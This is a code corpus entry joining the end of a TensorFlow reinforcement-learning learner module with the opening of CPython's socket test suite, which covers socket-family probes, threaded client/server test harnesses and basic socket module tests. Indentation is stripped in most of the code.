self.replay_buffer.save(self.save_path, '%09d_%s' % (self.epoch, self.learner_name))
def _training_step(self):
train_ops = tuple([op for op, loss in zip(self.train_ops,
self.train_losses)
if loss is not None])
outs = self.sess.run(train_ops + self.inspect_losses)
self.running_total += np.array(outs[len(train_ops):])
self.denom += 1.
self.update_i += 1
def _poll_interactors(self, continuous_poll=False, frames_before_terminate=None):
# poll the interactors for new frames.
# the synced_condition semaphore prevents this from consuming too much CPU
while not self.kill_threads:
if self.learner_config["frames_per_update"] is not False and not continuous_poll:
with self.need_frames_notification: self.need_frames_notification.wait()
while not self.interactor_queue.empty():
new_frames = self.interactor_queue.get()
self._add_frames(new_frames)
if frames_before_terminate and self.total_frames >= frames_before_terminate: return
def _add_frames(self, frames):
with self.replay_buffer_lock:
for frame in frames:
self.replay_buffer.add_replay(*frame)
self.total_frames = self.replay_buffer.count
return self.total_frames
def _run_enqueue_data(self):
while not self.kill_threads:
data = self.replay_buffer.random_batch(self.learner_config["batch_size"])
self.sess.run(self.enqueue_op, feed_dict=dict(list(zip(self.data_loaders, data))))
def _kill_threads(self):
self.kill_threads = True
class CoreModel(object):
"""The base class for the "core" of learners."""
def __init__(self, name, env_config, learner_config):
self.name = self.saveid + "/" + name
self.env_config = env_config
self.learner_config = learner_config
with tf.variable_scope(self.name):
self.epoch_n = tf.get_variable('epoch_n', [], initializer=tf.constant_initializer(0), dtype=tf.int64, trainable=False)
self.update_n = tf.get_variable('update_n', [], initializer=tf.constant_initializer(0), dtype=tf.int64, trainable=False)
self.frame_n = tf.get_variable('frame_n', [], initializer=tf.constant_initializer(0), dtype=tf.int64, trainable=False)
self.hours = tf.get_variable('hours', [], initializer=tf.constant_initializer(0.), dtype=tf.float64, trainable=False)
self.epoch_n_placeholder = tf.placeholder(tf.int64, [])
self.update_n_placeholder = tf.placeholder(tf.int64, [])
self.frame_n_placeholder = tf.placeholder(tf.int64, [])
self.hours_placeholder = tf.placeholder(tf.float64, [])
self.assign_epoch_op = [tf.assign(self.epoch_n, self.epoch_n_placeholder), tf.assign(self.update_n, self.update_n_placeholder), tf.assign(self.frame_n, self.frame_n_placeholder), tf.assign(self.hours, self.hours_placeholder)]
self.create_params(env_config, learner_config)
self.model_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name)
self.saver = tf.train.Saver(self.model_params)
@property
def saveid(self):
raise Exception("specify a save ID")
def create_params(self, env_config, learner_config):
raise Exception("unimplemented")
def update_epoch(self, sess, epoch, updates, frames, hours):
sess.run(self.assign_epoch_op, feed_dict={self.epoch_n_placeholder: int(epoch), self.update_n_placeholder: int(updates), self.frame_n_placeholder: int(frames), self.hours_placeholder: float(hours)})
def save(self, sess, path, epoch=None):
if epoch is None: self.saver.save(sess, path + "/%s.params" % self.saveid)
else: self.saver.save(sess, path + "/%09d_%s.params" % (epoch, self.saveid))
def load(self, sess, path, epoch=None):
if epoch is None: self.saver.restore(sess, path + "/%s.params" % self.saveid)
else: self.saver.restore(sess, path + "/%09d_%s.params" % (epoch, self.saveid))
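# Illustrative sketch, not part of the original file: the smallest possible
# CoreModel subclass just names a save ID and builds its parameters inside the
# variable scope opened by CoreModel.__init__. The class name and the single
# parameter below are hypothetical.
class _ExampleCore(CoreModel):
    @property
    def saveid(self):
        return "example"
    def create_params(self, env_config, learner_config):
        # variables created here land under self.name and are captured by self.saver
        self.dummy_param = tf.get_variable("dummy_param", [1], initializer=tf.constant_initializer(0.))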
def run_learner(learner_subclass, queue, lock, config, env_config, learner_config, **bonus_kwargs):
learner = learner_subclass(queue, lock, config, env_config, learner_config, **bonus_kwargs)
try:
learner._start()
while True: learner._learn()
except Exception as e:
print('Caught exception in learner process')
traceback.print_exc()
learner._kill_threads()
print()
raise e
|
test_socket.py
|
import unittest
from test import support
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = socket_helper.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
if not hasattr(socket, 'IOCTL_VM_SOCKETS_GET_LOCAL_CID'):
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_j1939():
"""Check whether CAN J1939 sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
def _have_socket_bluetooth():
"""Check whether AF_BLUETOOTH sockets are supported on this host."""
try:
# RFCOMM is supported by all platforms with bluetooth support. Windows
# does not support omitting the protocol.
s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)
except (AttributeError, OSError):
return False
else:
s.close()
return True
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_CAN_J1939 = _have_socket_can_j1939()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
HAVE_SOCKET_UDPLITE = hasattr(socket, "IPPROTO_UDPLITE")
HAVE_SOCKET_BLUETOOTH = _have_socket_bluetooth()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = socket_helper.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPLITETest(SocketUDPTest):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
self.port = socket_helper.bind_port(self.serv)
class ThreadSafeCleanupTestCase:
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ip link set up vcan0
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8-byte aligned because of the `frames` member (see
`struct can_frame` definition). Native, not standard, types must be used for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
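# Illustrative sketch, not part of the original test suite: packing and
# unpacking a classic CAN frame with the "=IB3x8s" layout documented in the
# SocketCANTest docstrings above. The helper name and sample values are
# hypothetical.
def _example_can_frame_roundtrip(can_id=0x123, data=b'\x01\x02\x03'):
    # "=IB3x8s": 32-bit can_id, one-byte data length code, 3 pad bytes, 8 data bytes;
    # struct zero-pads the 8s field, so short payloads need no manual padding.
    frame = struct.pack(SocketCANTest.can_frame_fmt, can_id, len(data), data)
    unpacked_id, dlc, payload = struct.unpack(SocketCANTest.can_frame_fmt, frame)
    return unpacked_id, payload[:dlc]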
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = socket_helper.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp()).
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.setUp = self._setUp
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = threading_helper.wait_threads_exit()
self.wait_threads.__enter__()
self.addCleanup(self.wait_threads.__exit__, None, None, None)
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
def raise_queued_exception():
if self.queue.qsize():
raise self.queue.get()
self.addCleanup(raise_queued_exception)
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
self.addCleanup(self.done.wait)
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class ThreadedUDPLITESocketTest(SocketUDPLITETest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPLITETest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
socket_helper.bind_unix_socket(sock, path)
self.addCleanup(os_helper.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
socket_helper.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class UDPLITETestBase(InetTestBase):
"""Base class for UDPLITE-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = socket_helper.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
class UDPLITE6TestBase(Inet6TestBase):
"""Base class for UDPLITE-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
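# Illustrative sketch, not part of the original suite: combining the mixins and
# bases above in the way the comment preceding SocketTestBase describes. This
# hypothetical class behaves like SocketConnectedTest, but over a Unix-domain
# stream socket instead of TCP, and defines no test methods of its own.
class _ExampleUnixConnectedTest(ConnectedStreamTestMixin, UnixStreamBase):
    pass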
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
support.gc_collect() # For PyPy or other GCs.
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
@unittest.skipUnless(sys.platform == 'darwin', 'macOS specific test')
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test3542SocketOptions(self):
# Ref. issue #35569 and https://tools.ietf.org/html/rfc3542
opts = {
'IPV6_CHECKSUM',
'IPV6_DONTFRAG',
'IPV6_DSTOPTS',
'IPV6_HOPLIMIT',
'IPV6_HOPOPTS',
'IPV6_NEXTHOP',
'IPV6_PATHMTU',
'IPV6_PKTINFO',
'IPV6_RECVDSTOPTS',
'IPV6_RECVHOPLIMIT',
'IPV6_RECVHOPOPTS',
'IPV6_RECVPATHMTU',
'IPV6_RECVPKTINFO',
'IPV6_RECVRTHDR',
'IPV6_RECVTCLASS',
'IPV6_RTHDR',
'IPV6_RTHDRDSTOPTS',
'IPV6_RTHDR_TYPE_0',
'IPV6_TCLASS',
'IPV6_USE_MIN_MTU',
}
for opt in opts:
self.assertTrue(
hasattr(socket, opt), f"Missing RFC3542 socket option '{opt}'"
)
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [socket_helper.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test socket_helper.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [socket_helper.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS and AT&T, may successfully
# resolve these IPs. In particular, AT&T's DNS Error Assist service
# will break this test. See https://bugs.python.org/issue42092 for a
# workaround.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
